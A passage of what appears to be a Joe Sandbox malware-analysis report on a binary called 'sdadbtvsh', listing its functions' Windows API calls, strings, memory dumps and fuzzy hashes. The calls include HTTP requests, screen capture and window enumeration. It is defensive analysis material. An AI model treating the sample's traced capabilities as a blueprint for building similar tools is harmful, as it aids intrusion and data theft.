                                                                                              • Opcode Fuzzy Hash: 6daa2b493ed072e9367011ec3da73fae374aac5c88069c4aedda138ad3dab632
                                                                                              • Instruction Fuzzy Hash: D4719131900709AFDB20DFA8CE89BAEBBF5FF48705F104919E646A35A0D779E945CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00610784
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0061078F
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0061079A
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 006107A5
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 006107B0
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 006107BB
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 006107C6
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 006107D1
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 006107DC
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 006107E7
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 006107F2
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 006107FD
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00610808
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00610813
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0061081E
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00610829
                                                                                              • GetCursorInfo.USER32(?), ref: 00610839
                                                                                              • GetLastError.KERNEL32 ref: 0061087B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                              • String ID:
                                                                                              • API String ID: 3215588206-0
                                                                                              • Opcode ID: 13dd5e6622902bd3fad144da7083def304f7d1d371cd58a485cace85016489e0
                                                                                              • Instruction ID: 703efa4ac42c35432f36bb39d92634635f00f8f5bc48685017daef93f07b1f2c
                                                                                              • Opcode Fuzzy Hash: 13dd5e6622902bd3fad144da7083def304f7d1d371cd58a485cace85016489e0
                                                                                              • Instruction Fuzzy Hash: 06418670D08319AADF50DFBA8C8989EBFE9FF44354B54452AE11CE7291DA78D841CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005B0456
                                                                                                • Part of subcall function 005B047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0066170C,00000FA0,0A78CFEC,?,?,?,?,005D2753,000000FF), ref: 005B04AC
                                                                                                • Part of subcall function 005B047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005D2753,000000FF), ref: 005B04B7
                                                                                                • Part of subcall function 005B047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005D2753,000000FF), ref: 005B04C8
                                                                                                • Part of subcall function 005B047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005B04DE
                                                                                                • Part of subcall function 005B047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005B04EC
                                                                                                • Part of subcall function 005B047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005B04FA
                                                                                                • Part of subcall function 005B047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B0525
                                                                                                • Part of subcall function 005B047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B0530
                                                                                              • ___scrt_fastfail.LIBCMT ref: 005B0477
                                                                                                • Part of subcall function 005B0433: __onexit.LIBCMT ref: 005B0439
                                                                                              Strings
                                                                                              • InitializeConditionVariable, xrefs: 005B04D8
                                                                                              • WakeAllConditionVariable, xrefs: 005B04F2
                                                                                              • kernel32.dll, xrefs: 005B04C3
                                                                                              • SleepConditionVariableCS, xrefs: 005B04E4
                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005B04B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                              • API String ID: 66158676-1714406822
                                                                                              • Opcode ID: b2c402cfe52dc739cdb12399aa68eebf7563c15763ad3991afc80839e8c852ef
                                                                                              • Instruction ID: 786006f3453a1c2ab2f2952650cbeb86e42250fd45c2933041a262ef56200197
                                                                                              • Opcode Fuzzy Hash: b2c402cfe52dc739cdb12399aa68eebf7563c15763ad3991afc80839e8c852ef
                                                                                              • Instruction Fuzzy Hash: C1210E326407116BD7305BA4AC0ABAB3FD6FF45B61F052115F501976D0DB70AC05CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(00000000,00000000,0062DCD0), ref: 00604E81
                                                                                              • _wcslen.LIBCMT ref: 00604E95
                                                                                              • _wcslen.LIBCMT ref: 00604EF3
                                                                                              • _wcslen.LIBCMT ref: 00604F4E
                                                                                              • _wcslen.LIBCMT ref: 00604F99
                                                                                              • _wcslen.LIBCMT ref: 00605001
                                                                                                • Part of subcall function 005AFD60: _wcslen.LIBCMT ref: 005AFD6B
                                                                                              • GetDriveTypeW.KERNEL32(?,00657C10,00000061), ref: 0060509D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 2055661098-1000479233
                                                                                              • Opcode ID: 11dbd61c25f4cbc81dd773cae0d93a35ef8eb126556fa0ba02c83cc9d3eeb7cc
                                                                                              • Instruction ID: a67620c2e1f20dbec3b32c0fa3204570b566c1bd45ac1aefe0dae78fcc9f85ad
                                                                                              • Opcode Fuzzy Hash: 11dbd61c25f4cbc81dd773cae0d93a35ef8eb126556fa0ba02c83cc9d3eeb7cc
                                                                                              • Instruction Fuzzy Hash: 2CB1D2716487029FC724DF28D990AAFBBE6BFD4720F10491DF59687292DB30D845CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0062DCD0), ref: 00614A18
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00614A2A
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0062DCD0), ref: 00614A4F
                                                                                              • FreeLibrary.KERNEL32(00000000,?,0062DCD0), ref: 00614A9B
                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,0062DCD0), ref: 00614B05
                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00614BBF
                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00614C25
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00614C4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                              • API String ID: 354098117-199464113
                                                                                              • Opcode ID: 03f5de321cbe78208ed4cde02e13550f30e6400cea4c1c893cbc3480745b9d4f
                                                                                              • Instruction ID: 19c4b63f3e7b8adbb62bba648d7fdb8c52bcfaede5145b4c89ac494e693fc39b
                                                                                              • Opcode Fuzzy Hash: 03f5de321cbe78208ed4cde02e13550f30e6400cea4c1c893cbc3480745b9d4f
                                                                                              • Instruction Fuzzy Hash: A7122E71A00115EFDB14DF54C884EEEBBB6FF45314F298098E915AB261DB31ED86CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060CE0D
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060CE20
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060CE34
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0060CE4D
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0060CE90
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0060CEA6
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060CEB1
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060CEE1
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060CF39
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060CF4D
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0060CF58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 3800310941-3916222277
                                                                                              • Opcode ID: 31a4a6ec6ffb6b50da6f5566f26911052e993f4b22530cc0ead93684280f771d
                                                                                              • Instruction ID: 6fc74ce21fd9b98ff96041d80bf043d135dc402a2681aad299b3b5396508ff77
                                                                                              • Opcode Fuzzy Hash: 31a4a6ec6ffb6b50da6f5566f26911052e993f4b22530cc0ead93684280f771d
                                                                                              • Instruction Fuzzy Hash: 5F51AFB0540609BFDB259F60CC48AAB7BFEFF08764F108619F945C6290D734D905DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00628EF1
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F01
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F0C
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F19
                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F27
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F36
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F3F
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F46
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F57
                                                                                              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00630C04,?), ref: 00628F70
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00628F80
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00628FA0
                                                                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00628FD0
                                                                                              • DeleteObject.GDI32(?), ref: 00628FF8
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0062900E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3840717409-0
                                                                                              • Opcode ID: 4cbc3b7a18bb91f84ca5386a0adceb050b2d5df06f885616e4d8784419d5ec6f
                                                                                              • Instruction ID: 31c5b6e81da10f4763b2ca68210ef8fc416db773f1f8cfdd2368c8f58cde2e0a
                                                                                              • Opcode Fuzzy Hash: 4cbc3b7a18bb91f84ca5386a0adceb050b2d5df06f885616e4d8784419d5ec6f
                                                                                              • Instruction Fuzzy Hash: 31411A75601614AFDB21DF65DD48EAE7BBAEF89751F104058F905D7260DB30AE02CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00612F35
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00612F45
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00612F51
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00612F5E
                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00612FCA
                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00613009
                                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0061302D
                                                                                              • SelectObject.GDI32(?,?), ref: 00613035
                                                                                              • DeleteObject.GDI32(?), ref: 0061303E
                                                                                              • DeleteDC.GDI32(?), ref: 00613045
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00613050
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 2598888154-3887548279
                                                                                              • Opcode ID: a66e872b74a3ea7e3b64a5dd2ed55df3eba0c1200e0d2c7ffb80b6affc827bf5
                                                                                              • Instruction ID: 2b8167192c3c554b598a639554711fbda7c5509f391081b6d1c37c524fac1eaf
                                                                                              • Opcode Fuzzy Hash: a66e872b74a3ea7e3b64a5dd2ed55df3eba0c1200e0d2c7ffb80b6affc827bf5
                                                                                              • Instruction Fuzzy Hash: 0461F2B5D00219EFCF14CFA8D888AEEBBB6FF48310F248419E955A7250D771A952CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 005F5223
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 005F5269
                                                                                              • _wcslen.LIBCMT ref: 005F527A
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 005F5286
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 005F52BB
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 005F52F3
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 005F532C
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 005F5375
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 005F53AF
                                                                                              • GetWindowRect.USER32(?,?), ref: 005F541A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                              • String ID: ThumbnailClass
                                                                                              • API String ID: 1311036022-1241985126
                                                                                              • Opcode ID: 0ab924be822bcdd2109b9de2eed8db3a054a1932328f2d3a9e3d3043bf2d1cf1
                                                                                              • Instruction ID: cf39d1728524f858222cadd4465f44d245943eb146ce5f5863b871e0d709a855
                                                                                              • Opcode Fuzzy Hash: 0ab924be822bcdd2109b9de2eed8db3a054a1932328f2d3a9e3d3043bf2d1cf1
                                                                                              • Instruction Fuzzy Hash: 5A91CF7110470A9FDB14CF14C989BBA7BA9FF84351F044529FF899A092EB38ED45CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(00662990,000000FF,00000000,00000030), ref: 005FC888
                                                                                              • SetMenuItemInfoW.USER32(00662990,00000004,00000000,00000030), ref: 005FC8BD
                                                                                              • Sleep.KERNEL32(000001F4), ref: 005FC8CF
                                                                                              • GetMenuItemCount.USER32(?), ref: 005FC915
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 005FC932
                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 005FC95E
                                                                                              • GetMenuItemID.USER32(?,?), ref: 005FC9A5
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005FC9EB
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FCA00
                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FCA21
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                              • String ID: 0
                                                                                              • API String ID: 1460738036-4108050209
                                                                                              • Opcode ID: 0cf6026a8bf612314ab32b9f81e8fc5990c025ae38d70a891347ba22bdc76048
                                                                                              • Instruction ID: ddc185e688bca1c6a9472801a71c2895c9fd2cc14b1ae03cf16e73a498ea6082
                                                                                              • Opcode Fuzzy Hash: 0cf6026a8bf612314ab32b9f81e8fc5990c025ae38d70a891347ba22bdc76048
                                                                                              • Instruction Fuzzy Hash: E7618E7090024EAFDF21CF64CA88AFEBFA9FF45344F100429EA41A3291D779AD45CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005FE3E9
                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005FE40F
                                                                                              • _wcslen.LIBCMT ref: 005FE419
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 005FE469
                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005FE485
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                              • API String ID: 1939486746-1459072770
                                                                                              • Opcode ID: 1f6b63eda9719378da584a9d6ce56ed9d921996bab76739fcb2e20a33de57502
                                                                                              • Instruction ID: d995a1f33f6db7e5f7acc0b1885d7617356b2dfb7d155fbd10bda1cbb583facb
                                                                                              • Opcode Fuzzy Hash: 1f6b63eda9719378da584a9d6ce56ed9d921996bab76739fcb2e20a33de57502
                                                                                              • Instruction Fuzzy Hash: ED411C726403197BEB14AB649C4BEFF3FACFF95710F100465F900A61D2FB78AA0196A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0060469A
                                                                                              • _wcslen.LIBCMT ref: 006046C7
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 006046F7
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00604718
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00604728
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006047AF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006047BA
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006047C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 1149970189-3457252023
                                                                                              • Opcode ID: 1790d4b2c5db7459577e9b48a567f44765d47498edc838deceb423a90a8d8fd1
                                                                                              • Instruction ID: a0274e1ea5f9245b155140490e0efcb4234f2a6635050a57788a0f10fa2e1a38
                                                                                              • Opcode Fuzzy Hash: 1790d4b2c5db7459577e9b48a567f44765d47498edc838deceb423a90a8d8fd1
                                                                                              • Instruction Fuzzy Hash: 8031A3B194021AABDB31DFA0DC49FEF37BEEF8A741F1041A5F605D61A0EB7096458B24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 005FEEE0
                                                                                                • Part of subcall function 005AF27E: timeGetTime.WINMM(?,?,005FEF00), ref: 005AF282
                                                                                              • Sleep.KERNEL32(0000000A), ref: 005FEF0D
                                                                                              • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 005FEF31
                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005FEF53
                                                                                              • SetActiveWindow.USER32 ref: 005FEF72
